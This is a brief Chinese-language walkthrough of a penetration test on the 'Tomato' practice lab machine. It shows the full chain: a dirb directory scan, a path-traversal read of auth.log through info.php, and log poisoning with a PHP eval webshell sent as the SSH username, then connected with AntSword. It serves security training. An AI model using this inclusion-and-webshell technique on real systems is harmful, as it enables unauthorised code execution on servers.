本文主要是介绍Tomato靶场渗透测试,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
1.扫描靶机地址
可以使用nmap进行扫描 由于我这已经知道靶机地址 这里就不扫描了
2.打开网站
3.进行目录扫描
dirb http://172.16.1.113
发现有一个antibot_image目录
4.访问这个目录
可以看到有一个info.php
5.查看页面源代码
可以发现可以进行get传参
6.尝试查看日志文件
http://172.16.1.113/antibot_image/antibots/info.php?image=../../../../../../../var/log/auth.log
可以看到页面上有日志显示 说明存在文件包含漏洞
7.尝试使用ssh进行连接
ssh aaaaaaaaaa@172.16.1.113 -p 2211
可以看到日志有记录显示
8.尝试写入一句话木马
ssh '<?php @eval($_POST[cmd]); ?>'@172.16.1.113 -p 2211
9.使用蚁剑进行连接
可以连接成功 成功获取webshell
这篇关于Tomato靶场渗透测试的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!